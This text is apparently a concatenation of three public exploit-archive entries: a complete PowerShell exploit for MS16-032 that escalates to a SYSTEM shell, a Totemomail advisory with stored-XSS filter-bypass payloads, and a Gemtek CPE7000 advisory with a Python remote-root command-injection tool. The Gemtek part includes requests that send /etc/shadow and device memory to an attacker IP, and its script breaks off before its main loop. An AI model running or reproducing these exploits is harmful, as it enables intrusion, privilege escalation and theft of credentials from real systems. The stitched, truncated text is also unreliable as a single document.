
function Invoke-MS16-032 {
<#
.SYNOPSIS
    
    PowerShell implementation of MS16-032. The exploit targets all vulnerable
    operating systems that support PowerShell v2+. Credit for the discovery of
    the bug and the logic to exploit it go to James Forshaw (@tiraniddo).
    
    Targets:
    
    * Win7-Win10 & 2k8-2k12 <== 32/64 bit!
    * Tested on x32 Win7, x64 Win8, x64 2k12R2
    
    Notes:
    
    * In order for the race condition to succeed the machine must have 2+ CPU
      cores. If testing in a VM just make sure to add a core if needed mkay.
    * Want to know more about MS16-032 ==>
      https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html

.DESCRIPTION
	Author: Ruben Boonen (@FuzzySec)
	Blog: http://www.fuzzysecurity.com/
	License: BSD 3-Clause
	Required Dependencies: PowerShell v2+
	Optional Dependencies: None
    
.EXAMPLE
	C:\PS> Invoke-MS16-032

.NOTES
	Review notes (defensive):
	* Observable artifact: the process-race loop below creates cmd.exe over and
	  over through CreateProcessWithLogonW (handled by the Secondary Logon
	  service) with CREATE_SUSPENDED and terminates each child right away, for
	  up to 10 seconds. Process-creation telemetry shows this as a burst of
	  very short-lived cmd.exe processes and is the simplest detection signal.
	* Remediation is the MS16-032 update itself: on a patched host
	  Get-ThreadHandle returns a zero handle and the function exits early.
	* Several handles opened here are never closed ($hThread, $SysTokenHandle,
	  $hDuplicateTokenHandle) and the background runspace is stopped but never
	  disposed; harmless for a one-shot run, but worth knowing when reading it.
#>
	Add-Type -TypeDefinition @"
	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;
	using System.Security.Principal;
	
	// Win32 interop surface used by the script below. Struct layouts mirror the
	// native definitions; only the members the script touches matter here.
	[StructLayout(LayoutKind.Sequential)]
	public struct PROCESS_INFORMATION
	{
		public IntPtr hProcess;
		public IntPtr hThread;
		public int dwProcessId;
		public int dwThreadId;
	}
	
	[StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
	public struct STARTUPINFO
	{
		public Int32 cb;
		public string lpReserved;
		public string lpDesktop;
		public string lpTitle;
		public Int32 dwX;
		public Int32 dwY;
		public Int32 dwXSize;
		public Int32 dwYSize;
		public Int32 dwXCountChars;
		public Int32 dwYCountChars;
		public Int32 dwFillAttribute;
		public Int32 dwFlags;
		public Int16 wShowWindow;
		public Int16 cbReserved2;
		public IntPtr lpReserved2;
		public IntPtr hStdInput;
		public IntPtr hStdOutput;
		public IntPtr hStdError;
	}
	
	// SECURITY_QUALITY_OF_SERVICE; passed to NtImpersonateThread.
	[StructLayout(LayoutKind.Sequential)]
	public struct SQOS
	{
		public int Length;
		public int ImpersonationLevel;
		public int ContextTrackingMode;
		public bool EffectiveOnly;
	}
	
	public static class Advapi32
	{
		[DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
		public static extern bool CreateProcessWithLogonW(
			String userName,
			String domain,
			String password,
			int logonFlags,
			String applicationName,
			String commandLine,
			int creationFlags,
			int environment,
			String currentDirectory,
			ref  STARTUPINFO startupInfo,
			out PROCESS_INFORMATION processInformation);
			
		[DllImport("advapi32.dll", SetLastError=true)]
		public static extern bool SetThreadToken(
			ref IntPtr Thread,
			IntPtr Token);
			
		[DllImport("advapi32.dll", SetLastError=true)]
		public static extern bool OpenThreadToken(
			IntPtr ThreadHandle,
			int DesiredAccess,
			bool OpenAsSelf,
			out IntPtr TokenHandle);
			
		[DllImport("advapi32.dll", SetLastError=true)]
		public static extern bool OpenProcessToken(
			IntPtr ProcessHandle, 
			int DesiredAccess,
			ref IntPtr TokenHandle);
			
		[DllImport("advapi32.dll", SetLastError=true)]
		public extern static bool DuplicateToken(
			IntPtr ExistingTokenHandle,
			int SECURITY_IMPERSONATION_LEVEL,
			ref IntPtr DuplicateTokenHandle);
	}
	
	public static class Kernel32
	{
		// NOTE(review): never called by this script. Managed callers should read
		// Marshal.GetLastWin32Error() (with SetLastError=true) rather than
		// P/Invoking GetLastError, whose value the runtime may have overwritten.
		[DllImport("kernel32.dll")]
		public static extern uint GetLastError();
	
		[DllImport("kernel32.dll", SetLastError=true)]
		public static extern IntPtr GetCurrentProcess();
	
		[DllImport("kernel32.dll", SetLastError=true)]
		public static extern IntPtr GetCurrentThread();
		
		[DllImport("kernel32.dll", SetLastError=true)]
		public static extern int GetThreadId(IntPtr hThread);
		
		[DllImport("kernel32.dll", SetLastError = true)]
		public static extern int GetProcessIdOfThread(IntPtr handle);
		
		[DllImport("kernel32.dll",SetLastError=true)]
		public static extern int SuspendThread(IntPtr hThread);
		
		[DllImport("kernel32.dll",SetLastError=true)]
		public static extern int ResumeThread(IntPtr hThread);
		
		[DllImport("kernel32.dll", SetLastError=true)]
		public static extern bool TerminateProcess(
			IntPtr hProcess,
			uint uExitCode);
	
		[DllImport("kernel32.dll", SetLastError=true)]
		public static extern bool CloseHandle(IntPtr hObject);
		
		[DllImport("kernel32.dll", SetLastError=true)]
		public static extern bool DuplicateHandle(
			IntPtr hSourceProcessHandle,
			IntPtr hSourceHandle,
			IntPtr hTargetProcessHandle,
			ref IntPtr lpTargetHandle,
			int dwDesiredAccess,
			bool bInheritHandle,
			int dwOptions);
	}
	
	// Undocumented native API; the signature is the one this script relies on.
	public static class Ntdll
	{
		[DllImport("ntdll.dll", SetLastError=true)]
		public static extern int NtImpersonateThread(
			IntPtr ThreadHandle,
			IntPtr ThreadToImpersonate,
			ref SQOS SecurityQualityOfService);
	}
"@
	
	function Get-ThreadHandle {
		# Starts a suspended cmd.exe via CreateProcessWithLogonW, duplicates
		# handle value 0x4 out of that child into this process, then kills the
		# child. Outputs the duplicated handle; it stays [IntPtr]::Zero when
		# DuplicateHandle did not populate it, which the caller treats as "patched".
		# NOTE(review): the return values of CreateProcessWithLogonW and
		# DuplicateHandle are stored in $CallResult but never checked.
		# StartupInfo Struct
		$StartupInfo = New-Object STARTUPINFO
		$StartupInfo.dwFlags = 0x00000100 # STARTF_USESTDHANDLES
		# The three standard-handle slots are filled with the current thread's
		# pseudo-handle; presumably the leak vector described in the write-up
		# linked in the help (not re-derived here).
		$StartupInfo.hStdInput = [Kernel32]::GetCurrentThread()
		$StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread()
		$StartupInfo.hStdError = [Kernel32]::GetCurrentThread()
		$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
		
		# ProcessInfo Struct
		$ProcessInfo = New-Object PROCESS_INFORMATION
		
		# CreateProcessWithLogonW --> lpCurrentDirectory
		$GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
		
		# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
		# The credentials are placeholders: with LOGON_NETCREDENTIALS_ONLY they are
		# only used for outbound network authentication, not validated locally.
		$CallResult = [Advapi32]::CreateProcessWithLogonW(
			"user", "domain", "pass",
			0x00000002, "C:\Windows\System32\cmd.exe", "",
			0x00000004, $null, $GetCurrentPath,
			[ref]$StartupInfo, [ref]$ProcessInfo)
		
		# Duplicate handle into current process -> DUPLICATE_SAME_ACCESS
		# 0x4 is a hard-coded handle value inside the child, not discovered at run time.
		$lpTargetHandle = [IntPtr]::Zero
		$CallResult = [Kernel32]::DuplicateHandle(
			$ProcessInfo.hProcess, 0x4,
			[Kernel32]::GetCurrentProcess(),
			[ref]$lpTargetHandle, 0, $false,
			0x00000002)
		
		# Clean up suspended process
		$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
		
		# Bare expression = this function's only pipeline output (every other call
		# result above is assigned, so nothing else leaks into the output stream).
		$lpTargetHandle
	}
	
	function Get-SystemToken {
		# Takes $hThread from the caller's scope (PowerShell dynamic scoping),
		# suspends that thread, impersonates it and opens its token, leaving the
		# handle in $script:SysTokenHandle for the caller. Every exit path after
		# a successful SuspendThread resumes the thread again.
		# NOTE(review): any Return before the $script:SysTokenHandle assignment
		# below leaves that variable unset ($null); the caller's `-eq 0` guard
		# does not treat $null as zero, so those failures are not caught there.
		echo "`n[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($hThread))).ProcessName)"
	
		# SuspendThread returns the previous suspend count; anything but 0 is treated as failure.
		$CallResult = [Kernel32]::SuspendThread($hThread)
		if ($CallResult -ne 0) {
			echo "[!] $hThread is a bad thread, exiting.."
			Return
		} echo "[+] Thread suspended"
		
		echo "[>] Wiping current impersonation token"
		$CallResult = [Advapi32]::SetThreadToken([ref]$hThread, [IntPtr]::Zero)
		if (!$CallResult) {
			echo "[!] SetThreadToken failed, exiting.."
			$CallResult = [Kernel32]::ResumeThread($hThread)
			echo "[+] Thread resumed!"
			Return
		}
		
		echo "[>] Building SYSTEM impersonation token"
		# SecurityQualityOfService struct
		$SQOS = New-Object SQOS
		$SQOS.ImpersonationLevel = 2 #SecurityImpersonation
		$SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS)
		# Undocumented API's, I like your style Microsoft ;)
		# ($sqos and $SQOS are the same variable: PowerShell names are case-insensitive.)
		$CallResult = [Ntdll]::NtImpersonateThread($hThread, $hThread, [ref]$sqos)
		if ($CallResult -ne 0) {
			echo "[!] NtImpersonateThread failed, exiting.."
			$CallResult = [Kernel32]::ResumeThread($hThread)
			echo "[+] Thread resumed!"
			Return
		}
		
		# Null $SysTokenHandle
		# Written at script scope so the caller can test it after this function returns.
		$script:SysTokenHandle = [IntPtr]::Zero

		# 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE
		$CallResult = [Advapi32]::OpenThreadToken($hThread, 0x0006, $false, [ref]$SysTokenHandle)
		if (!$CallResult) {
			echo "[!] OpenThreadToken failed, exiting.."
			$CallResult = [Kernel32]::ResumeThread($hThread)
			echo "[+] Thread resumed!"
			Return
		}
		
		echo "[?] Success, open SYSTEM token handle: $SysTokenHandle"
		echo "[+] Resuming thread.."
		$CallResult = [Kernel32]::ResumeThread($hThread)
	}
	
	# main() <--- ;)
	$ms16032 = @"
	 __ __ ___ ___   ___     ___ ___ ___ 
	|  V  |  _|_  | |  _|___|   |_  |_  |
	|     |_  |_| |_| . |___| | |_  |  _|
	|_|_|_|___|_____|___|   |___|___|___|
	                                    
	               [by b33f -> @FuzzySec]
"@
	
	$ms16032
	
	# Check logical processor count, race condition requires 2+
	echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)"
	if ($([System.Environment]::ProcessorCount) -lt 2) {
		echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n"
		Return
	}
	
	echo "[>] Duplicating CreateProcessWithLogonW handle"
	$hThread = Get-ThreadHandle
	
	# If no thread handle is captured, the box is patched
	if ($hThread -eq 0) {
		echo "[!] No valid thread handle was captured, exiting!`n"
		Return
	} else {
		echo "[?] Done, using thread handle: $hThread"
	} echo "`n[*] Sniffing out privileged impersonation token.."
	
	# Get handle to SYSTEM access token
	Get-SystemToken
	
	# If we fail a check in Get-SystemToken, exit
	# NOTE(review): only fires when Get-SystemToken reached its assignment and
	# OpenThreadToken left the handle at zero; if it returned earlier the
	# variable is $null and `$null -eq 0` is $false, so execution continues.
	if ($SysTokenHandle -eq 0) {
		Return
	}
	
	echo "`n[*] Sniffing out SYSTEM shell.."
	echo "`n[>] Duplicating SYSTEM token"
	# 2 = SecurityImpersonation. The result is not checked; a failed call leaves
	# $hDuplicateTokenHandle at zero and the race below runs with a null token.
	$hDuplicateTokenHandle = [IntPtr]::Zero
	$CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle)
	
	# Simple PS runspace definition
	# A second runspace keeps re-applying the duplicated token to $hThread while the
	# main thread races process creation below. $AscObj is never EndInvoke'd and the
	# runspace is never closed; Stop() is the only teardown performed.
	echo "[>] Starting token race"
	$Runspace = [runspacefactory]::CreateRunspace()
	$StartTokenRace = [powershell]::Create()
	$StartTokenRace.runspace = $Runspace
	$Runspace.Open()
	[void]$StartTokenRace.AddScript({
		Param ($hThread, $hDuplicateTokenHandle)
		while ($true) {
			$CallResult = [Advapi32]::SetThreadToken([ref]$hThread, $hDuplicateTokenHandle)
		}
	}).AddArgument($hThread).AddArgument($hDuplicateTokenHandle)
	$AscObj = $StartTokenRace.BeginInvoke()
	
	echo "[>] Starting process race"
	# Adding a timeout (10 seconds) here to safeguard from edge-cases
	# Defender note: this loop is the noisy part - every iteration is a cmd.exe
	# creation (suspended) followed by TerminateProcess, for up to 10 s.
	$SafeGuard = [diagnostics.stopwatch]::StartNew()
	while ($SafeGuard.ElapsedMilliseconds -lt 10000) {

		# StartupInfo Struct
		$StartupInfo = New-Object STARTUPINFO
		$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
		
		# ProcessInfo Struct
		$ProcessInfo = New-Object PROCESS_INFORMATION
		
		# CreateProcessWithLogonW --> lpCurrentDirectory
		$GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
		
		# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
		$CallResult = [Advapi32]::CreateProcessWithLogonW(
			"user", "domain", "pass",
			0x00000002, "C:\Windows\System32\cmd.exe", "",
			0x00000004, $null, $GetCurrentPath,
			[ref]$StartupInfo, [ref]$ProcessInfo)
		
		#---
		# Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.
		#---
		# Missing this check used to cause the exploit to fail sometimes.
		# If CreateProcessWithLogon fails OpenProcessToken won't succeed
		# but we obviously don't have a SYSTEM shell :'( . Should be 100%
		# reliable now!
		#---
		if (!$CallResult) {
			continue
		}
			
		# 0x28 --> TOKEN_ADJUST_PRIVILEGES -bor TOKEN_QUERY
		$hTokenHandle = [IntPtr]::Zero
		$CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)
		# If we can't open the process token it's a SYSTEM shell!
		# (Failure to open the token is used as the success signal; the child is
		# resumed and its handles are intentionally left open on this path.)
		if (!$CallResult) {
			echo "[!] Holy handle leak Batman, we have a SYSTEM shell!!`n"
			$CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)
			$StartTokenRace.Stop()
			$SafeGuard.Stop()
			Return
		}
			
		# Clean up suspended process
		# NOTE(review): $hTokenHandle opened above is never closed on this path.
		$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)

	}
	
	# Kill runspace & stopwatch if edge-case
	$StartTokenRace.Stop()
	$SafeGuard.Stop()
}
            
Document Title:
===============
Totemomail v4.x & v5.x - Filter Bypass & Persistent Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1769


Release Date:
=============
2016-04-08


Vulnerability Laboratory ID (VL-ID):
====================================
1769


Common Vulnerability Scoring System:
====================================
3.8


Product & Service Introduction:
===============================
totemomail® Encryption Gateway protects your email communication with customers and business partners whereas 
totemomail Internal Encryption secures your internal email traffic. In combination, they become the innovative and potent 
hybrid encryption solution totemomail Hybrid Encryption. totemomail Encryption Gateway features a high level of security and 
it is easy for end users and administrators alike to use. The everyday user will have no need to think about encryption because 
the software is based on a high level of automation.

(Copy of the Vendor Homepage: http://www.totemo.com/products/mail/overview/introduction/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered an application-side vulnerability and a 
filter bypass issue in the Totemo Email Gateway v4.0 b1343 and v5.0 b512 appliance series .


Vulnerability Disclosure Timeline:
==================================
2016-02-26: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2016-02-27: Vendor Notification (Totemomail Security Team)
2016-02-30: Vendor Response/Feedback (TotemomailSecurity Team)
2016-03-11: Vendor Fix/Patch (Totemomail Developer Team)
2016-04-13: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation web vulnerability and a filter bypass issue has been discovered in the official Totemo Email Gateway v4.0 b1343 and v5.0 b512 appliance series .
The filter bypass issue allows an attacker to evade the controls of a protection or restriction mechanism to compromise further web module context or service functions.
The persistent validation vulnerability allows an attacker to inject own malicious script codes on the application-side of the vulnerable web-application module context.

The persistent input validation web vulnerability has been discovered in the `Betreff(Subject)` and `Message (Body)` input fields of the `Neue Nachricht (New Message)` module.
The attacker can inject malicious script code into the message body or subject input field. After the injection, the (non-executable) content is sent to another manager via the 
secure mail interaction. After the message arrives, the receiver clicks `save as html`. At the moment the encoded mail content is generated as HTML, the malicious 
injected tag is getting visible as executable context. The injection point of the vulnerability are the `subject` and `message body` input fields and the execution point 
occurs in the moment the target manager generated the message as html to review or print.

The regular filter mechanism and validation does not allow to inject for example iframes and basic script code tags like script, iframe, div to the web input forms. As far as 
a payload is included, for example in the subject, the validation parses and encodes the string and shows only the first two characters. We figured out that it is possible 
to bypass by usage of `img` script code tags with onload alert. The encoding of the input needs to be restricted permanently against special char inputs, the validation procedure 
needs to parse and encode the input without extending the entry with a null location entry.

Vulnerable Module(s):
				[+] Posteingang - Nachricht

Vulnerable Input(s):
				[+] Subject (Betreff)
				[+] Message Body (Nachricht)

Affected Module(s):
				[+] Message Index (main.jsp)
				[+] Save as Html (Als HTML Speichern)


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers with low privileged web-application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

1.1
Manual steps to reproduce the vulnerability ...
1. Open a new message
2. Include any random demo text first
3. Include now at least in the message body the script code payloads
4. Scroll above back to the subject and include the same payload to the subject input field
5. Save the entry as draft
6. You can now already see that the service attached to the script code another alt value
Note: "><img src="x" alt="null"> "><"<img src="x" alt="null">%20%20> ...
7. Now you send the message directly to a manager for reply
8. The manager receives the message and tries to review it as html
9. The execution occurs in the subject and the message body of the html file
Note: The html file is wrong encoded and does not parse the values again next to generating the html source file
10. Successful reproduce of the filter bypass issue and persistent vulnerability!


PoC: Filter Bypass
"><"<img src="x">%20%20>"<iframe src=a>%20<iframe>
"><img src=x onerror=prompt(23);>
>"<<img src="c" onerror=alert(1)>


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure filter and parse of img onload alert script code tags that actually can bypass the filter validation of the Betreff input fields.
After that encode and parse the print function that stream the context in html format were the execution point occurs finally.
Restrict the input finally and disallow usage of special chars in the subject input field to prevent persistent script code injection attacks.
In the second step a secure validation of the pgp key filename (email|preeshare) and input is required to secure encode the vulnerable email and name value of the certificate file.
Re-encode the editor text values to no get obviously broken format context back like demonstrated in the picture.

Fix (temp): Do not open email via save as function in html to prevent exploitation of the issue.

Totemo AG: The vulnerability is already patched in the newest version of the appliance web-application to protect customers.
The update can be processed automatically or by manual interaction with the web-service.


Security Risk:
==============
The security risk of the filter bypass issue and application-side input validation encoding vulnerability in the totemomail Hybrid Encryption appliance web-application.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (research@vulnerability-lab.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, 
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, 
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised 
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing 
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 				- admin@evolution-sec.com
Section:    magazine.vulnerability-db.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically 
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or 
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific 
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.

				    Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
            
#!/usr/bin/python

'''
# Exploit Title: Gemtek CPE7000 / WLTCS-106 multiple vulnerabilities
# Date: 04/06/2016
# Exploit Author: Federico Ramondino - framondino[0x40]mentat[0x2e]is
# Vendor Homepage: gemtek.com.tw
# Version: Firmware Version 01.01.02.082
# Tested on: 
# Product Name : CPE7000
# Model ID : WLTCS-106
# Hardware Version : V02A
# Firmware Version : 01.01.02.082

1) SID leak / auth bypass
The sysconf cgi application leaks a valid "SID" (session id) when the
following unauthenticated request is made:
Request: GET /cgi-bin/sysconf.cgi?page=ajax.asp&action=login_confirm HTTP/1.1

The response body has the form: <checkcode>,<sid>
Example resp: RJIi,BtsS2OdhcVSbviDC5iMa1MKeo9rbrgdQ

The sid thus obtained can be used to "unlock" the client-side administration
interface and/or to directly issue requests that are usually restricted to
administrative accounts.

POCs: 

I) Unauthenticated remote reboot:
Request:
/cgi-bin/sysconf.cgi?page=ajax_check.asp&action=reboot&reason=1&sid=<SID>

II) Web admin interface access. Add a new cookie with the following values: 
userlevel=2
sid=<sid>

--------------------------------------------------------------------------------

2) Arbitrary file download - with root privileges - via iperf tool
One of the diagnostic tools available on the device can be used to read an
arbitrary file on the device. The sysconfg cgi application fails to sanitize
user input, allowing an attacker to hijack the command issued to the "iperf"
binary, a commonly-used network testing tool that can create TCP and UDP data
streams and measure the throughput of a network that is carrying them.

The client-side validation can be easily bypassed by changing the javascript
validation code, or by directly sending a forged request to the server.
The iperf tool is run with the -c switch, meaning that it is behaving as a
client that sends data to a server. By adding the -F parameter, iperf is forced
to read data from a file instead of generating random data to be sent during the
measurement.

This attack needs two steps in order to take advantage of the vulnerability.
The first request sets up the command to be run; the second one (a.k.a. toggle)
actually runs the command (check the response body: 1 means running, 0 means stopped).

The following "SETUP" request can be used to set the correct parameters:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
p=X.X.X.X&perf_measure_server_port=YYYY&perf_measure_cpe_port=5554&perf_measure_
test_time=ZZ&perf_measure_protocol_type=1&perf_measure_packet_data_length=1024&
perf_measure_bandwidth=19m&perf_measure_client_num=1%20-F%20 <URLENCODED PATH TO
FILE>

Parameters breakdown:
XXX.XXX.XXX.XXX = attacker ip
YYYY = attacker listening port
zz = time limit
Note: nc is enough to capture data, which may be sent with some additional
header and footer introduced by iperf's protocol

In order to run iperf, the following "TOGGLE" (run/stop) request must be sent:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle


POCs:
I) download of /etc/shadow
SETUP REQUEST:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
p=X.X.X.X&perf_measure_server_port=YYYY&perf_measure_cpe_port=5554&perf_measure_
test_time=30&perf_measure_protocol_type=1&perf_measure_packet_data_length=1024&p
erf_measure_bandwidth=19m&perf_measure_client_num=1%20-F%20%2fetc%2fshadow

RUN/STOP(Toggle) REQUEST:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle


II) download of device physical memory (/dev/mem) with increased perf_measure_test_time:
SETUP REQUEST:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
p=X.X.X.X&perf_measure_server_port=YYYY&perf_measure_cpe_port=5554&perf_measure_
test_time=6000&perf_measure_protocol_type=1&perf_measure_packet_data_length=1024
&perf_measure_bandwidth=19m&perf_measure_client_num=1%20-F%20%2fdev%2fmem

RUN/STOP(Toggle) REQUEST:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle

--------------------------------------------------------------------------------

3) Unauthenticated remote root command execution
The same vulnerability can be used to issue an arbitrary command on the device.
The command executed on the system to run the diagnostic tool is constructed
using the sprintf function and the following format string, with no additional
checks:

iperf -c "%s" -p %s -t %s -l %s -b %s -L %s -r -u > /tmp/iperf.txt &

It is therefore possible to insert another command by injecting it in the 
"perf_measure_server_ip" parameter and commenting out the rest of the original
command.

To concatenate a command, the string in the first half before the injection
point ( iperf -c " ) must be correctly closed with quotes ( " ).
Then the new command can be added, preceded by a semicolon ( ; ).
Finally, the other part of the original command after the "injection point"
must be commented out ( # ).

iperf -c ""; <NEWCMD> #" -p %s -t %s -l %s -b %s -L %s -r -u > /tmp/iperf.txt &


SETUP REQUEST:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
p=%22%3b%20<COMMAND_HERE>%20%23&perf_measure_server_port=5555&perf_measure_cpe_p
ort=5554&perf_measure_test_time=60&perf_measure_protocol_type=1&perf_measure_pac
ket_data_length=1024&perf_measure_bandwidth=19m&perf_measure_client_num=1

RUN/STOP(Toggle) REQUEST:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle


POC (echo test > /www/test):
/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
p=%22%3b%20echo%20test%20%3E%20%2fwww%2ftest%20%23&perf_measure_server_port=5555
&perf_measure_cpe_port=5554&perf_measure_test_time=60&perf_measure_protocol_type
=1&perf_measure_packet_data_length=1024&perf_measure_bandwidth=19m&perf_measure_
client_num=1

and toggle:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle

--------------------------------------------------------------------------------

Remediation:
Disable wan access to the management web interface until an updated firmware is released.

More information and a detailed how-to is available at: http://www.mentat.is/docs/cpe7000-multiple-vulns.html
'''

#Gemtek CPE7000 / WLTCS-106 remote root command execution
#Author: Federico Ramondino - framondino[0x40]mentat[0x2e]is
# Tested on: 
# 		Product Name : 	CPE7000
#		Model ID : 	WLTCS-106
#		Hardware Version : 	V02A
#		Firmware Version : 	01.01.02.082

import httplib
import ssl
import urllib
import time
import sys
import getopt
import socket

# Disable TLS certificate verification for every HTTPSConnection in this
# process (private ssl API; Python 2.7.9+). Presumably needed because the
# appliance serves an untrusted certificate - not verified here. Side effect:
# nothing in this tool can detect an intercepted connection.
ssl._create_default_https_context = ssl._create_unverified_context

host=''  # target host, filled from argv[1] below
port = 443  # target port; argv[2] overrides it (as a str - callers str() it anyway)

def check():
	# Probe: an unauthenticated GET to the diagnostic-tools page must answer
	# HTTP 200 for the host to be treated as affected. Returns True on 200,
	# False on any other status; exits the whole process on a socket error.
	# NOTE(review): only the status code is inspected, never the body, so any
	# page served with 200 counts as a positive result.
	try:
        	conn = httplib.HTTPSConnection(host +":"+str(port), timeout=10)
        	conn.request("GET", "/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1")
        	r1 = conn.getresponse()
        	if r1.status != 200:
			return False
        	return True
	except socket.error as msg:
		print "Cannot connect";  # Python 2 print statement; `msg` itself is not reported
		sys.exit();


def sendcmd( cmd ):
	# Runs one shell command through the iperf parameter injection described
	# in the module docstring and prints whatever the command wrote to its
	# output file. Sequence: (1) "setup" request stores the crafted
	# perf_measure_server_ip value, (2) "toggle" request starts the stored
	# command; the docstring says the toggle response is 1 when running and 0
	# when stopped, so a second toggle is sent if the first one stopped a
	# still-running job, (3) after a fixed 1 s wait the output file is fetched.
	# NOTE(review): the output lands in /www/cmdoutput.txt on the device and is
	# served over HTTP - a concrete forensic indicator that this tool was used.
	resource = '"; ' + cmd + ' &> /www/cmdoutput.txt #'
	urlencoded = urllib.quote_plus(resource)
	cmdresource = "/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_ip=" +urlencoded + "&perf_measure_server_port=5555&perf_measure_cpe_port=5554&perf_measure_test_time=60&perf_measure_protocol_type=1&perf_measure_packet_data_length=1024&perf_measure_bandwidth=19m&perf_measure_client_num=1"
	res = makereq (cmdresource)
	res =makereq ("/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle")
	if(res!="1"):
		res =makereq ("/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle")
	time.sleep(1)  # fixed delay; commands that take longer than this print partial or empty output
	res = makereq ("/cmdoutput.txt")
	print res


def makereq (resource):
	# GET `resource` from the configured host/port over HTTPS and return the
	# raw response body (a str in Python 2).
	# NOTE(review): unlike check() there is no timeout, the status code is not
	# examined, and the connection is never closed - each call holds a socket
	# until the object is garbage collected.
	conn = httplib.HTTPSConnection(host +":"+str(port))
	conn.request("GET", resource)
	r1 = conn.getresponse()
	body = r1.read()
	return body


# --- entry point -----------------------------------------------------------
# Usage: GemtekShell.py <host> [<port> (443)]
# argv[1] is the host; argv[2], when present, replaces the default port and is
# kept as a string (check()/makereq() call str() on it either way).
if len(sys.argv) < 2:
	print 'GemtekShell.py <host> [<port> (443)]'
	exit()
elif len(sys.argv) > 2:
	port = sys.argv[2]

host = sys.argv[1]

print 'Connecting to ', host, port

# check() exits the process itself on a connection error; a non-200 answer
# is reported here and the tool stops.
